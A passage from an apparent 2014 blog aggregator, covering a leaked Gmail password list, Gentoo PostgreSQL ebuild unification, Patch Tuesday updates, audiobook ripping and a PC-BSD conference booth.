Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

fgrep . extensions.txt | sort -u
This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happens is that this list was compiled with breaches of different small websites that wouldn't make a headline (and that most likely did not report to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people not using different passwords across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2 Factor Authentication everywhere is possible.


Unifying PostgreSQL Ebuilds titanofold | 2014-09-10 14:01 UTC

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds.I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way. Especially when that way is wrong and makes things more tedious and difficult than they ought to be.

I’m to blame for pressing forward with the splitting the ebuilds to -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea. I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and just see disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on the updating the dependent packages as well so they’re all ready to go in one shot.


Adobe today released updates to fix at least a dozen critical security problems in its Flash Player and AIR software. Separately, Microsoft pushed four update bundles to address at least 42 vulnerabilities in Windows, Internet Explorer, Lync and .NET Framework. If you use any of these, it’s time to update!

Most of the flaws Microsoft fixed today (37 of them) are addressed in an Internet Explorer update — the only patch this month to earn Microsoft’s most-dire “critical” label. A critical update wins that rating if the vulnerabilities fixed in the update could be exploited with little to no action on the part of users, save for perhaps visiting a hacked or malicious Web site with IE.

I’ve experienced troubles installing Patch Tuesday packages along with .NET updates, so I make every effort to update .NET separately. To avoid any complications, I would recommend that Windows users install all other available recommended patches except for the .NET bundle; after installing those updates, restart Windows and then install any pending .NET fixes). Your mileage may vary.

For more information on the rest of the updates released today, see this post at the Microsoft Security Response Center Blog.

Adobe’s critical update for Flash Player fixes at least 12 security holes in the program. Adobe is urging Windows and Macintosh users to update to Adobe Flash Player v. 15.0.0.152 by visiting the Adobe Flash Player Download Center, or via the update mechanism within the product when prompted. If you’d rather not be bothered with downloaders and software “extras” like antivirus scanners, you’re probably best off getting the appropriate update for your operating system from this link.

To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed (required by some programs like Pandora Desktop), you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15 for Windows, Mac, and Android.

Adobe had also been scheduled to release updates today for Adobe Reader and Acrobat, but the company said it was pushing that release date back to the week of Sept. 15 to address some issues that popped up during testing of the patches.

As always, if you experience any issues updating these products, please leave a note about your troubles in the comments below.


In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed in all my phones and tablets, with at least a few books preloaded whenever I travel. Of course as I said, I keep the majority of my audiobooks in the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I have bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series which is my among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to fix that now that I no longer have access to my personal iTunes account on a mac to re-download the Audiobook Builder and process them. In particular, the list of mp3s that I'm looking forward to merge together are the years 2013 and 2014 of BBC's The News Quiz, to which I'm addicted and listen continuously. Being able to join them all together so I can listen to them with a multi-day-running playlist is one of the very few things that still let me sleep relatively calmly — I say relatively because I really don't remember when was the last time I have slept soundly in about an year by now.

Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast), and create a playlist — then for what I'm concerned I don't have to use an iPod at all. Well, beside the fact that I'd have to find a way to shut up notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by the Facebook pop notification is not something that I'm looking forward for most of the time. And in some cases I even have had some background update disrupting my playback so there is definitely space for improvement.


PC-BSD at Fossetcon Official PC-BSD Blog | 2014-09-09 15:13 UTC

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation.  Dru Lavigne will present “ZFS 101″ at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 On Saturday.